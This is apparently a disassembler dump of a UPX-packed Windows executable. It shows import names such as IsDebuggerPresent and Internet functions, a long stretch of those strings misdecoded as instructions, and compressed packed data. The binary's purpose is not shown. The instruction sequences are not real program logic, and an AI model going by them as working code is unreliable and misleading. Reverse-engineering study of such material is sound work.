db 1
aWritefile db 'WriteFile',0
dw 5201h
aEadfile db 'eadFile',0
db 1
aGetfilesizeex db 'GetFileSizeEx',0
db 1
aClosehandle db 'CloseHandle',0
db 1
aGetfilesize db 'GetFileSize',0
db 1, 53h, 65h
aTfilepointer db 'tFilePointer',0
db 1, 53h, 65h
aTendoffile db 'tEndOfFile',0
db 1
aTerminateproce db 'TerminateProcess',0
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 1
aUnhandledexcep db 'UnhandledExceptionFilter',0
dw 5301h
aEtunhandledexc db 'etUnhandledExceptionFilter',0
db 1
aIsdebuggerpres db 'IsDebuggerPresent',0
db 1
; ---------------------------------------------------------------------------
loc_41211F: ; CODE XREF: UPX1:0040E0B0�j
inc edi
db 65h
jz short loc_412166
outsd
insd
insd
popa
outsb
db 64h
dec esp
imul ebp, [esi+65h], 48010041h
db 65h
popa
jo short near ptr loc_412177+4
jb short loc_41219C
add gs:[ecx], al
inc edi
db 65h
jz short loc_412194
db 65h
jb short loc_4121B4
imul ebp, [edi+6Eh], 417845h
add [eax+65h], ecx
popa
jo short near ptr loc_41218D+2
insb
insb
outsd
arpl [eax], ax
add [edi+65h], eax
jz short loc_4121A8
jb short near ptr loc_4121C8+1
arpl [ebp+73h], sp
jnb short near ptr loc_4121A6+1
db 65h
popa
jo short $+2
add [edi+65h], eax
loc_412166: ; CODE XREF: UPX1:00412120�j
jz short loc_4121BB
jz short near ptr loc_4121C8+3
jb short loc_4121E0
jnz short near ptr loc_4121DC+2
dec ecx
outsb
outsw
inc ecx
add [ecx], al
push edx
popa
loc_412177: ; CODE XREF: UPX1:00412133�j
imul esi, [ebx+65h], 65637845h
jo short loc_4121F4
imul ebp, [edi+6Eh], 74520100h
insb
push ebp
outsb
ja short near ptr loc_4121F4+1
outsb
loc_41218D: ; CODE XREF: UPX1:0041214C�j
add fs:[ecx], al
inc edi
db 65h
jz short loc_4121E1
loc_412194: ; CODE XREF: UPX1:0041213B�j
outsd
db 64h
jnz short near ptr loc_412202+2
db 65h
dec eax
popa
outsb
loc_41219C: ; CODE XREF: UPX1:00412135�j
db 64h
insb
db 65h
inc ecx
add [ecx], al
inc edi
db 65h
jz short near ptr loc_4121F4+2
loc_4121A6: ; CODE XREF: UPX1:0041215D�j
jb short loc_412217
loc_4121A8: ; CODE XREF: UPX1:00412156�j
arpl [ecx+64h], ax
db 64h
jb short loc_412213
jnb short near ptr loc_412222+1
add [ecx], al
push esp
insb
loc_4121B4: ; CODE XREF: UPX1:0041213E�j
jnb short loc_4121FD
db 65h
jz short near ptr loc_41220E+1
popa
insb
loc_4121BB: ; CODE XREF: UPX1:loc_412166�j
jnz short loc_412222
add [ecx], al
push esp
insb
jnb short near ptr loc_412202+2
insb
insb
outsd
arpl [eax], ax
loc_4121C8: ; CODE XREF: UPX1:00412158�j
; UPX1:00412168�j
add [esp+ebp*2+73h], edx
push ebx
db 65h
jz short near ptr loc_412224+2
popa
insb
jnz short near ptr loc_412238+1
add [ecx], al
push esp
insb
jnb short near ptr loc_41221F+1
jb short loc_412241
loc_4121DC: ; CODE XREF: UPX1:0041216C�j
add gs:[ecx], al
dec ecx
loc_4121E0: ; CODE XREF: UPX1:0041216A�j
outsb
loc_4121E1: ; CODE XREF: UPX1:00412191�j
jz short near ptr loc_412247+1
jb short near ptr loc_41224E+3
outsd
arpl [ebx+65h], bp
db 64h
dec ecx
outsb
arpl [edx+65h], si
insd
outs dx, byte ptr gs:[esi]
jz short $+2
loc_4121F4: ; CODE XREF: UPX1:0041217E�j
; UPX1:0041218A�j ...
add [ebx+65h], edx
jz short loc_412245
popa
jnb short loc_412270
inc ebp
loc_4121FD: ; CODE XREF: UPX1:loc_4121B4�j
jb short near ptr loc_412270+1
outsd
jb short $+2
loc_412202: ; CODE XREF: UPX1:00412195�j
; UPX1:004121C1�j
add [edi+65h], eax
jz short near ptr loc_412247+3
jnz short loc_41227B
jb short loc_412270
outsb
jz short near ptr loc_412261+1
loc_41220E: ; CODE XREF: UPX1:004121B6�j
push 64616572h
loc_412213: ; CODE XREF: UPX1:004121AB�j
dec ecx
add fs:[ecx], al
loc_412217: ; CODE XREF: UPX1:loc_4121A6�j
inc edi
db 65h
jz short near ptr loc_412263+4
popa
jnb short near ptr loc_412291+1
inc ebp
loc_41221F: ; CODE XREF: UPX1:004121D8�j
jb short loc_412293
outsd
loc_412222: ; CODE XREF: UPX1:loc_4121BB�j
; UPX1:004121AE�j
jb short $+2
loc_412224: ; CODE XREF: UPX1:004121CD�j
add [ecx+6Eh], ecx
jz short near ptr loc_41228D+1
jb short loc_412297
outsd
arpl [ebx+65h], bp
db 64h
inc esp
arpl gs:[edx+65h], si
insd
outs dx, byte ptr gs:[esi]
loc_412238: ; CODE XREF: UPX1:004121D2�j
jz short $+2
add [ebx+6Ch], edx
db 65h, 65h
jo short $+4
loc_412241: ; CODE XREF: UPX1:004121DA�j
add [eax+65h], ecx
popa
loc_412245: ; CODE XREF: UPX1:004121F7�j
jo short near ptr loc_412297+3
loc_412247: ; CODE XREF: UPX1:loc_4121E1�j
; UPX1:00412205�j
imul edi, [edx+65h], 78450100h
loc_41224E: ; CODE XREF: UPX1:004121E3�j
imul esi, [eax+edx*2+72h], 7365636Fh
jnb short $+2
add [edi+65h], eax
jz short near ptr loc_4122A9+1
outsd
db 64h
jnz short near ptr loc_4122CC+1
loc_412261: ; CODE XREF: UPX1:0041220C�j
db 65h
inc esi
loc_412263: ; CODE XREF: UPX1:00412218�j
imul ebp, [ebp+4Eh], 41656D61h
add [ecx], al
inc esi
jb short loc_4122D5
loc_412270: ; CODE XREF: UPX1:004121FA�j
; UPX1:00412209�j ...
db 65h
inc ebp
outsb
jbe short near ptr loc_4122DC+2
jb short near ptr loc_4122E4+2
outsb
insd
outs dx, byte ptr gs:[esi]
loc_41227B: ; CODE XREF: UPX1:00412207�j
jz short loc_4122D0
jz short near ptr loc_4122F0+1
imul ebp, [esi+67h], 1004173h
inc edi
db 65h
jz short loc_4122CF
outsb
jbe short near ptr loc_4122F5+1
loc_41228D: ; CODE XREF: UPX1:00412227�j
jb short near ptr loc_4122F7+7
outsb
insd
loc_412291: ; CODE XREF: UPX1:0041221C�j
outs dx, byte ptr gs:[esi]
loc_412293: ; CODE XREF: UPX1:loc_41221F�j
jz short loc_4122E8
jz short loc_412309
loc_412297: ; CODE XREF: UPX1:00412229�j
; UPX1:loc_412245�j
imul ebp, [esi+67h], 46010073h
jb short near ptr loc_412303+2
db 65h
inc ebp
outsb
jbe short loc_41230E
jb short near ptr loc_412315+1
outsb
insd
loc_4122A9: ; CODE XREF: UPX1:0041225B�j
outs dx, byte ptr gs:[esi]
jz short near ptr loc_4122FF+1
jz short loc_412321
imul ebp, [esi+67h], 1005773h
push edi
imul esp, [ebp+43h], 54726168h
outsd
dec ebp
jnz short near ptr loc_41232E+1
jz short loc_41232E
inc edx
jns short near ptr loc_41233A+2
add gs:[ecx], al
inc edi
loc_4122CC: ; CODE XREF: UPX1:0041225E�j
db 65h
jz short loc_412314
loc_4122CF: ; CODE XREF: UPX1:00412287�j
outsb
loc_4122D0: ; CODE XREF: UPX1:loc_41227B�j
jbe short near ptr loc_41233A+1
jb short loc_412343
outsb
loc_4122D5: ; CODE XREF: UPX1:0041226E�j
insd
outs dx, byte ptr gs:[esi]
jz short near ptr loc_41232C+1
jz short loc_41234E
loc_4122DC: ; CODE XREF: UPX1:00412273�j
imul ebp, [esi+67h], 1005773h
push ebx
loc_4122E4: ; CODE XREF: UPX1:00412275�j
db 65h
jz short near ptr loc_41232E+1
popa
loc_4122E8: ; CODE XREF: UPX1:loc_412293�j
outsb
db 64h
insb
db 65h
inc ebx
outsd
jnz short near ptr loc_41235A+4
loc_4122F0: ; CODE XREF: UPX1:0041227D�j
jz short $+2
add [edi+65h], eax
loc_4122F5: ; CODE XREF: UPX1:0041228B�j
jz short loc_41233D
loc_4122F7: ; CODE XREF: UPX1:loc_41228D�j
imul ebp, [ebp+54h], 657079h
loc_4122FF: ; CODE XREF: UPX1:004122AB�j
add [ebp+6Ch], eax
loc_412303: ; CODE XREF: UPX1:0041229E�j
db 65h
jz short near ptr loc_41236A+1
inc ebx
jb short near ptr loc_412371+1
loc_412309: ; CODE XREF: UPX1:00412295�j
jz short loc_412374
arpl [ecx+6Ch], sp
loc_41230E: ; CODE XREF: UPX1:004122A3�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
loc_412314: ; CODE XREF: UPX1:loc_4122CC�j
outsb
loc_412315: ; CODE XREF: UPX1:004122A5�j
add [ecx], al
dec eax
db 65h
popa
jo short near ptr loc_41235A+6
db 65h
jnb short near ptr loc_41238D+6
jb short near ptr loc_41238D+3
loc_412321: ; CODE XREF: UPX1:004122AD�j
jns short $+2
add [eax+65h], ecx
popa
jo short loc_41236C
jb short near ptr loc_41238D+3
popa
loc_41232C: ; CODE XREF: UPX1:004122D8�j
jz short near ptr loc_41238D+6
loc_41232E: ; CODE XREF: UPX1:004122C3�j
; UPX1:004122C1�j ...
add [ecx], al
push esi
imul esi, [edx+74h], 466C6175h
jb short loc_41239F
loc_41233A: ; CODE XREF: UPX1:loc_4122D0�j
; UPX1:004122C6�j
add gs:[ecx], al
loc_41233D: ; CODE XREF: UPX1:loc_4122F5�j
push ecx
jnz short loc_4123A5
jb short loc_4123BB
push eax
loc_412343: ; CODE XREF: UPX1:004122D2�j
db 65h
jb short loc_4123AC
outsd
jb short loc_4123B6
popa
outsb
arpl [ebp+43h], sp
loc_41234E: ; CODE XREF: UPX1:004122DA�j
outsd
jnz short loc_4123BF
jz short near ptr loc_4123B6+2
jb short $+2
add [edi+65h], eax
jz short loc_4123AE
loc_41235A: ; CODE XREF: UPX1:004122EE�j
; UPX1:0041231A�j
imul esp, [ebx+6Bh], 6E756F43h
jz short $+2
add [edi+65h], eax
jz short near ptr loc_4123AA+1
jnz short loc_4123DC
loc_41236A: ; CODE XREF: UPX1:loc_412303�j
jb short loc_4123D1
loc_41236C: ; CODE XREF: UPX1:00412327�j
outsb
jz short loc_4123BF
jb short loc_4123E0
loc_412371: ; CODE XREF: UPX1:00412307�j
arpl [ebp+73h], sp
loc_412374: ; CODE XREF: UPX1:loc_412309�j
jnb short loc_4123BF
add fs:[ecx], al
inc edi
db 65h
jz short near ptr loc_4123CF+1
jns short near ptr loc_4123ED+5
jz short near ptr loc_4123E0+6
insd
push esp
imul ebp, [ebp+65h], 69467341h
insb
db 65h
push esp
loc_41238D: ; CODE XREF: UPX1:0041231F�j
; UPX1:00412329�j ...
imul ebp, [ebp+65h], 654C0100h
popa
jbe short loc_4123FC
inc ebx
jb short loc_412403
jz short near ptr loc_412404+1
arpl [ecx+6Ch], sp
loc_41239F: ; CODE XREF: UPX1:00412338�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
loc_4123A5: ; CODE XREF: UPX1:0041233E�j
outsb
add [ecx], al
inc ebp
outsb
loc_4123AA: ; CODE XREF: UPX1:00412366�j
jz short near ptr loc_41240C+5
loc_4123AC: ; CODE XREF: UPX1:loc_412343�j
jb short near ptr loc_4123ED+4
loc_4123AE: ; CODE XREF: UPX1:00412358�j
jb short near ptr loc_412417+2
jz short near ptr loc_412417+4
arpl [ecx+6Ch], sp
push ebx
loc_4123B6: ; CODE XREF: UPX1:00412347�j
; UPX1:00412351�j
arpl gs:[ecx+ebp*2+6Fh], si
loc_4123BB: ; CODE XREF: UPX1:00412340�j
outsb
add [ecx], al
inc edi
loc_4123BF: ; CODE XREF: UPX1:0041234F�j
; UPX1:0041236D�j ...
db 65h
jz short near ptr loc_412404+1
push eax
dec ecx
outsb
outsw
add [ecx], al
inc edi
db 65h
jz short near ptr loc_41240C+2
inc ebx
push eax
loc_4123CF: ; CODE XREF: UPX1:0041237A�j
add [ecx], al
loc_4123D1: ; CODE XREF: UPX1:loc_41236A�j
inc edi
db 65h
jz short loc_412424
inc ebp
dec ebp
inc ebx
push eax
add [ecx], al
dec ecx
loc_4123DC: ; CODE XREF: UPX1:00412368�j
jnb short loc_412434
popa
insb
loc_4123E0: ; CODE XREF: UPX1:0041236F�j
; UPX1:0041237F�j
imul esp, [ebx+eax*2+6Fh], 61506564h
add gs:[bx+di], al
push esi
loc_4123ED: ; CODE XREF: UPX1:loc_4123AC�j
; UPX1:0041237D�j
imul esi, [edx+74h], 416C6175h
insb
insb
outsd
arpl [eax], ax
add [eax+65h], ecx
loc_4123FC: ; CODE XREF: UPX1:00412395�j
popa
jo short loc_412451
db 65h
inc ecx
insb
insb
loc_412403: ; CODE XREF: UPX1:00412398�j
outsd
loc_412404: ; CODE XREF: UPX1:0041239A�j
; UPX1:loc_4123BF�j
arpl [eax], ax
add [edi+ebp*2+61h], ecx
db 64h
dec esp
loc_41240C: ; CODE XREF: UPX1:004123CA�j
; UPX1:loc_4123AA�j
imul esp, [edx+72h], 41797261h
add [ecx], al
dec ecx
outsb
loc_412417: ; CODE XREF: UPX1:loc_4123AE�j
; UPX1:004123B0�j
imul esi, [ecx+ebp*2+61h], 657A696Ch
inc ebx
jb short loc_41248B
jz short near ptr loc_41248B+2
loc_412424: ; CODE XREF: UPX1:004123D2�j
arpl [ecx+6Ch], sp
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [ecx], al
inc edi
db 65h
jz short near ptr loc_41247D+3
loc_412434: ; CODE XREF: UPX1:loc_4123DC�j
outsd
arpl [ecx+6Ch], sp
db 65h
dec ecx
outsb
outsw
inc ecx
add [ecx], al
inc edi
db 65h
jz short near ptr byte_412497
jz short loc_4124B8
imul ebp, [esi+67h], 65707954h
inc ecx
add [ecx], al
dec ebp
loc_412451: ; CODE XREF: UPX1:004123FD�j
jnz short loc_4124BF
jz short loc_4124BE
inc edx
jns short near ptr loc_4124CB+1
db 65h
push esp
outsd
push edi
imul esp, [ebp+43h], 726168h
add [edi+65h], eax
jz short loc_4124BC
jz short loc_4124DD
imul ebp, [esi+67h], 65707954h
push edi
add [ecx], al
dec esp
inc ebx
dec ebp
popa
jo short near ptr loc_4124CB+3
jz short loc_4124EF
loc_41247D: ; CODE XREF: UPX1:00412431�j
imul ebp, [esi+67h], 4C010041h
inc ebx
dec ebp
popa
jo short loc_4124DC
jz short loc_4124FD
loc_41248B: ; CODE XREF: UPX1:00412420�j
; UPX1:00412422�j
imul ebp, [esi+67h], 6D000057h
; ---------------------------------------------------------------------------
dw 0
db 0, 20h, 0B1h
byte_412497 db 0 ; CODE XREF: UPX1:00412441�j
db 0
db 1, 49h, 6Eh
aTernetclosehan db 'ternetCloseHandle',0
dw 4901h
dd 7265746Eh, 4F74656Eh
; ---------------------------------------------------------------------------
loc_4124B8: ; CODE XREF: UPX1:00412444�j
jo short loc_41251F
outsb
inc ecx
loc_4124BC: ; CODE XREF: UPX1:00412467�j
add [ecx], al
loc_4124BE: ; CODE XREF: UPX1:00412453�j
dec ecx
loc_4124BF: ; CODE XREF: UPX1:loc_412451�j
outsb
jz short near ptr byte_412527
jb short near ptr word_412532
db 65h
jz short near ptr byte_412519
db 65h
popa
db 64h
inc esi
loc_4124CB: ; CODE XREF: UPX1:00412456�j
; UPX1:00412479�j
imul ebp, [ebp+0], 746E4901h
db 65h
jb short near ptr dword_412544
db 65h
jz short near ptr dword_412528
jo short loc_412540
outsb
loc_4124DC: ; CODE XREF: UPX1:00412487�j
push ebp
loc_4124DD: ; CODE XREF: UPX1:00412469�j
jb short loc_41254B
inc ecx
; ---------------------------------------------------------------------------
dd 0
dd 45500000h, 14C0000h
db 4, 0, 0A8h
; ---------------------------------------------------------------------------
loc_4124EF: ; CODE XREF: UPX1:0041247B�j
mov esi, 4960h
; ---------------------------------------------------------------------------
dd 0
dd 0E00000h
db 3
; ---------------------------------------------------------------------------
loc_4124FD: ; CODE XREF: UPX1:00412489�j
add [ebx], ecx
add [eax], ecx
; ---------------------------------------------------------------------------
db 2 dup(0), 0B0h
dd 50000000h, 0
dd 41430000h, 10000000h, 0C0000000h
db 0
byte_412519 db 3 dup(0) ; CODE XREF: UPX1:004124C4�j
db 40h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_41251F: ; CODE XREF: UPX1:loc_4124B8�j
adc [eax], al
; ---------------------------------------------------------------------------
db 2 dup(0), 10h
db 2 dup(0), 4
byte_412527 db 0 ; CODE XREF: UPX1:004124C0�j
dword_412528 dd 0 dd 40000h
db 2 dup(0)
word_412532 dw 0 ; CODE XREF: UPX1:004124C2�j
dd 20000000h, 10000001h, 7E260000h
; ---------------------------------------------------------------------------
loc_412540: ; CODE XREF: UPX1:004124D9�j
add [eax], eax
add al, [eax]
; ---------------------------------------------------------------------------
dword_412544 dd 0 db 10h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_41254B: ; CODE XREF: UPX1:loc_4124DD�j
adc [eax], al
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0E55C0000h, 3C0000h, 10000000h, 0B00001h, 0Eh dup(0)
dd 0DAF00000h, 400000h, 2 dup(0)
dd 0C0000000h, 1340000h, 6 dup(0)
dd 742E0000h, 747865h, 0A1E50000h, 10000000h, 0B0000000h
dd 10000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 2C280000h, 0C0000000h
dd 30000000h, 0C0000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 1A280000h, 0F0000000h
dd 10000000h, 0F0000000h, 3 dup(0)
dd 400000h, 722EC000h, 637273h, 0B00000h, 10000000h, 10000001h
dd 0
dd 1, 2 dup(0)
dd 400000h, 10004000h, 0E6CC0001h, 0
dd 114E6h, 0C3CAA5F4h, 130405C7h, 6BC23654h, 3C08B9A4h
dd 0D9390000h, 0B15F4157h, 26220B40h, 76E59B65h, 2A034CCAh
dd 5F15F884h, 3FCB971Bh, 0DCCC03B2h, 12AE0040h, 0DC8024C5h
dd 2E59AE90h, 30231331h, 0FFFE580Bh, 0DB3872E4h, 74731FD3h
dd 676E6972h, 6F6F7420h, 0FE6F6C20h, 8DB7F60h, 61760C00h
dd 2064696Ch, 736F7017h, 0FF697469h, 18DDDB3Fh, 0D2338800h
dd 6E555724h, 776F6E6Bh, 7865206Eh, 65056563h, 1D70BDD7h
dd 941F9C77h, 60223827h, 8F01474Dh, 730FB788h, 2E0F9640h
dd 7235696Dh, 0B7BBFF74h, 6E4500FFh, 65646F63h, 74646F50h
dd 4B277265h, 454E5245h, 2E32334Ch, 0B0BFEF44h, 444C4CCFh
dd 6C461F65h, 65724673h, 0C80E0765h, 6553F6D8h, 75A35674h
dd 6C41470Bh, 0DBD5035Dh, 43B63C1h, 0CA430388h, 6FF6EDEDh
dd 0BE784572h, 65167250h, 6D537373h, 0BDBDB673h, 642E43EDh
dd 75720028h, 656D6958h, 0BF1D72C3h, 72D50B40h, 547A0DAAh
dd 53534F4Ch, 66FF92DDh, 53000E11h, 93474E49h, 0CB7FDB4Fh
dd 12414DDAh, 36520011h, 0C343330h, 0C2E1FF41h, 70610D0Bh
dd 61633870h, 6168200Fh, 146D2073h, 61B5AEB6h, 741714BFh
dd 0DD266DC1h, 623066B6h, 68071361h, 0E6204316h, 7F86DFDAh
dd 61726232h, 0E7207972h, 0D6F29C9Bh, 7463FFDAh, 0A2E796Ch
dd 40656C50h, 746E111Bh, 81DBB561h, 275D31BDh, 0E75735Bh
dd 0AE6F75CEh, 6D27192Eh, 6DC06620h, 81CB43D8h, 6D0A758Dh
dd 339F2E23h, 775B732Dh, 864120D9h, 0DC4D5B75h, 0B7A2604Ch
dd 66ADBAD6h, 69626DCDh, 6D187355h, 8DD7D62h, 6420806Fh
dd 4A6EFC75h, 0DE648676h, 5BE3AD91h, 7A826107h, 762F540Ah
dd 13DBEEF7h, 39659264h, 67756220h, 6F79200Fh, 3ED7343Ah
dd 202EABB0h, 9F2A7249h, 6BB73DADh, 656BEB50h, 0C2ADCE5Dh
dd 0B76B6F0Ch, 666F116Ch, 6C6C545Dh, 5B685F29h, 0A52D93F9h
dd 2827FF69h, 766C632Fh, 72DA16F6h, 63289E29h, 9461A749h
dd 5C75AE73h, 1A75A26Eh, 0CE1C02FCh, 441B7B37h, 69614D49h
dd 1632F7FBh, 0A935B6B6h, 9E046566h, 82703568h, 4D161C33h
dd 76882E65h, 10392130h, 77312F12h, 0FB64C278h, 5452BC65h
dd 840A0C6Fh, 3AB4B9ADh, 0EC0F2E53h, 9BD873BDh, 609F4930h
dd 0BB073B77h, 38321F64h, 0A66261FAh, 30B6B59Bh, 0AD4F8182h
dd 81B42427h, 77E337ECh, 0A79B770h, 36372CB9h, 8D647473h
dd 352067DDh, 76FD7570h, 87628069h, 2175B425h, 0A628C9A0h
dd 5FF90A6Dh, 652A5F34h, 0ED7B2795h, 6582FB5h, 315FE2DCh
dd 7B423739h, 706FF761h, 0F6FEB3Fh, 0D6D80C9h, 2B637386h
dd 98707438h, 377046B6h, 48631931h, 239D81BEh, 0D6766D37h
dd 759B6A61h, 589BF68h, 0AD832F6Bh, 34174610h, 0D09A4864h
dd 2E61B76Dh, 0FAF4F20Dh, 22DB5B78h, 68738C71h, 968E5229h
dd 0C8E44DEBh, 52BBF9C5h, 741C1C7Bh, 881CEEEFh, 87D2040Bh
dd 0F2617740h, 14B433C3h, 103930B2h, 3E422AB5h, 65925AD7h
dd 99382B2Dh, 9595BBECh, 73287567h, 0CC0C3257h, 0C466EBA0h
dd 9B9B1A74h, 96C97AF1h, 0C1DE42h, 6D685B76h, 0B568B94Dh
dd 69561566h, 24D660E5h, 2B2B433Ch, 0B6F44C0Fh, 13FCCDEDh
dd 0A0Ah, 672E703Ch, 67736D14h, 20DF99D0h, 773E6175h, 1EDB3D32h
dd 21A64506h, 3A26502Dh, 0A2507620h, 6CDC3BDAh, 6AF497AFh
dd 4ED0612Fh, 937E62h, 0FFFFFFFFh, 4030201h, 8070605h
dd 0C0B0A09h, 100F0E0Dh, 14131211h, 18171615h, 1C1B1A19h
dd 201F1E1Dh, 0FFFE3605h, 24232221h, 28272625h, 2C2B2A29h
dd 2F2E2Dh, 0FFFFCE32h, 3635FFFFh, 3A393837h, 3E3D3C3Bh
dd 4241403Fh, 46454443h, 4A494847h, 4E4D4C4Bh, 5251504Fh
dd 0FC6D5453h, 58D9406Fh, 5C5B5A59h, 605F5E5Dh, 6F0B63A8h
dd 66F3B0BFh, 6B6A6938h, 70B36D6Ch, 75FD7271h, 0FFF51724h
dd 79787776h, 7D7C7B7Ah, 3D007F7Eh, 81A9BC85h, 72439DC9h
dd 32C22709h, 1ADAD835h, 0EC533041h, 0CC0FA76Eh, 3E4C26Fh
dd 6E72656Bh, 47A06C65h, 3713C0C3h, 33170B43h, 77055CBAh
dd 316A624Fh, 27F0B637h, 0C606F0DDh, 20AE6C1Bh, 49656948h
dd 0DD796863h, 0FC68DB6Ch, 705D6376h, 6D421F1Eh, 4E1ECE14h
dd 623B4124h, 0B2C1C027h, 0A02E1385h, 56E9590Ch, 79541B6Bh
dd 61604421h, 2608AEB8h, 0FFB46110h, 8D6DB1A1h, 1D646F14h
dd 0B0A97460h, 6763AE75h, 449876E7h, 3B79FA63h, 94212D73h
dd 604899E8h, 7B20D923h, 7F627607h, 1CE52B29h, 644FB2A7h
dd 0F7922579h, 429AE648h, 47B82517h, 0B2C096C9h, 661D3923h
dd 60C6B023h, 2B92E765h, 0CA9094BDh, 14930F92h, 2695B2B6h
dd 9DC34F27h, 88F8854Ch, 9E034A7Fh, 5BF68581h, 738F2B5Dh
dd 0C6B1E79h, 1D1FCAD8h, 0E6F43660h, 8E408A16h, 410F67BCh
dd 48F1B784h, 8776117h, 8B096DBh, 7F66761Ch, 70374886h
dd 0F234B0Bh, 684954AEh, 7B7EDEB8h, 75034845h, 0EBED7464h
dd 0D5CE0EC0h, 1D1B0CB2h, 95B08546h, 63F46FB0h, 27E120D9h
dd 5A3F1F3Eh, 9620C183h, 0C6567664h, 742212C2h, 25188770h
dd 0BFEF102Ch, 4A3864A1h, 213273B7h, 3B2D9A72h, 3F482630h
dd 0E8BC205Bh, 2AFA612Dh, 846CD87Fh, 15BC3F2Dh, 4DC11494h
dd 0B3840B60h, 0A417D301h, 0DF7417ACh, 23DF088Eh, 0EB1B4358h
dd 76CDD962h, 66132FB2h, 33D5E0Bh, 0BAE9267Ch, 3C3C37E5h
dd 3E3E003Dh, 32F0B25h, 0BE6B9E2Dh, 232A2BA6h, 3307267Ch
dd 2A67659Ah, 29280715h, 6B663E2Ch, 3E3FECCFh, 3F024300h
dd 6BA77D00h, 2A3E009Bh, 32B0B33h, 3DC3422Dh, 0B2B4FD3h
dd 0D94B4530h, 0A76F1F74h, 3D8B21A7h, 23170021h, 0CF00E619h
dd 0B6DD27CBh, 5F5FE2E4h, 0E67E130h, 0DC720B64h, 1A0F2BEDh
dd 9701769h, 0AD073436h, 498E7B10h, 1F7E2BF2h, 7BD1EC31h
dd 0BF60B0Ch, 73244AF6h, 160423F7h, 66B83E5Bh, 73EDF60h
dd 2B286477h, 0C7AC3D45h, 35BCEC8h, 0A69A69A6h, 909CA8B4h
dd 0E9B35B84h, 1F707C9Ah, 0C9DA4F64h, 4D968C03h, 587834D3h
dd 54CE5C3Ch, 6BA6BA69h, 4C500B00h, 0A6444803h, 40A69A69h
dd 282C303Ch, 9A69A69Ah, 181C2024h, 9DD91014h, 80C69AEh
dd 0FC03044Bh, 9A69A6CDh, 0F0F4F866h, 0A69AE8ECh, 0E0E49A69h
dd 0D0D4D8DCh, 69A69A69h, 0C0C4C8CCh, 9A69A6BCh, 0A8B4B8A6h
dd 0AE9A949Ch, 70889A69h, 30635064h, 9D34D310h, 347CC7Bh
dd 9D708CB0h, 4C4D34DBh, 0CBE8042Ch, 34D4036Fh, 0CC34D34Dh
dd 849098BCh, 0D34D34DBh, 10385874h, 4D87CAE8h, 39D34D3h
dd 30547894h, 0E84C0204h, 3FC9D836h, 16F853C9h, 0D7804EA6h
dd 0B12B7657h, 53E845F0h, 55170474h, 580372A7h, 49302742h
dd 0ABE3BC1Dh, 4C1B5F0Dh, 416341FCh, 59B36950h, 13BA45ACh
dd 0DDB460Fh, 51B716B8h, 786F429Fh, 59545531h, 4553E032h
dd 32019152h, 205C94C9h, 91322028h, 48003Ch, 4C808410h
dd 811000C8h, 0C810B03Bh, 1823F01h, 1902193h, 83211002h
dd 1BF70C8h, 472451Dh, 8C610168h, 196C0h, 5C810B01h, 2010136h
dd 956CA83Bh, 42FFDF0Dh, 1DF332Eh, 1B141B14h, 16C2259h
dd 23EF2F00h, 0F702365Bh, 0AFFFF11h, 8189006Ah, 85848382h
dd 89888786h, 0FF8C8B8Ah, 8DFFFFFFh, 91908F8Eh, 95949392h
dd 99989796h, 9D9C9B9Ah, 0A1A09F9Eh, 0A5A4A3A2h, 0A9A8A7A6h
dd 0FEACABAAh, 0ADFFFFFFh, 0B1B0AFAEh, 0B5B4B3B2h, 0B9B8B7B6h
dd 0BDBCBBBAh, 0C1C0BFBEh, 0C5C4C3C2h, 0C9C8C7C6h, 0FFFFCBCAh
dd 0CE7B0DFFh, 0D2D1D0CFh, 0D6D5D4D3h, 0DAD9D8D7h, 0DEDDDCDBh
dd 0E2E1E0DFh, 0C0E5E4E3h, 0E6FFFFFFh, 0EAE9E8E7h, 0EEEDECEBh
dd 0F2F1F0EFh, 0F6F5F4F3h, 0FAF9F8F7h, 0FEFDFCFBh, 46010AFFh
dd 0CAB0D025h, 0D0402006h, 85548FFh, 61587FA3h, 1F5024A1h
dd 40027F41h, 3A48487Fh, 0FB3A6D6Dh, 4DCD9B9Ah, 202C6400h
dd 7908204Dh, 96E40300h, 2F0B00ADh, 0A25082Fh, 4D5BA0F4h
dd 0CB4D4103h, 9BC93557h, 4E0BC683h, 874F766Fh, 0BF33E0B5h
dd 14B1530Ah, 68EAB541h, 73B375A9h, 51234ABBh, 43EECFA3h
dd 41656E07h, 89BAD370h, 4D90F04Ch, 62650FEDh, 9EF7BD72h
dd 6123DC99h, 5F670A6Eh, 0EF7BDEEBh, 474B5357h, 43793743h
dd 0DEF7B601h, 23333B3Fh, 58EDBE61h, 18646E7Bh, 54095E4Fh
dd 0D6B01268h, 1373B068h, 0C7CEF57h, 76742B1Dh, 4D097554h
dd 7553104Ah, 9B9EF7BDh, 373B4307h, 0DCE7272Fh, 1F23EF7Bh
dd 150E0742h, 0CF62E71Ch, 312A2339h, 9C8D86B3h, 9439CE73h
dd 0B0A9A29Bh, 3DC219B7h, 0CCC5BEE7h, 8BB0D300h, 6F954D14h
dd 504D8707h, 156FC52Eh, 3A7074A1h, 6D232F2Fh, 0AD85669h
dd 1E372CADh, 0A9BE3461h, 65E836D6h, 4E2F3B2Eh, 7B05FD02h
dd 3D2F617Fh, 6A2E786Eh, 2F436770h, 332744Ch, 6964308Bh
dd 0B5685E6Ch, 814A31C0h, 723E543Ch, 14A1243Fh, 697A6F77h
dd 5DB36536h, 45DDDB36h, 4E05031Eh, 0FF89281Dh, 188CDAFFh
dd 47B31A35h, 0E41FA85Dh, 46A1359Ah, 646148D2h, 4114435Dh
dd 170F5FA0h, 3375081Dh, 40DB4C04h, 99865C53h, 6C0FD765h
dd 0FCDCB003h, 6733DE27h, 0FF00B32Dh, 0ABAC1907h, 3BC0DFh
dd 0DD43FD9Ch, 0ED973613h, 0B03B442Eh, 0C00113DBh, 5F600DBh
dd 1FC859h, 0A226B5Bh, 0F8A5B0C9h, 7DD60213h, 9F088F01h
dd 6486A714h, 123FB00h, 0C85CF8A7h, 446D85E5h, 0DC54F7DCh
dd 0B606DC64h, 0FD5C5E40h, 0B617643Bh, 947C27F9h, 4BA49BDCh
dd 33480324h, 0D994017Ch, 0B833490Ch, 0DD30F0E0h, 2C384030h
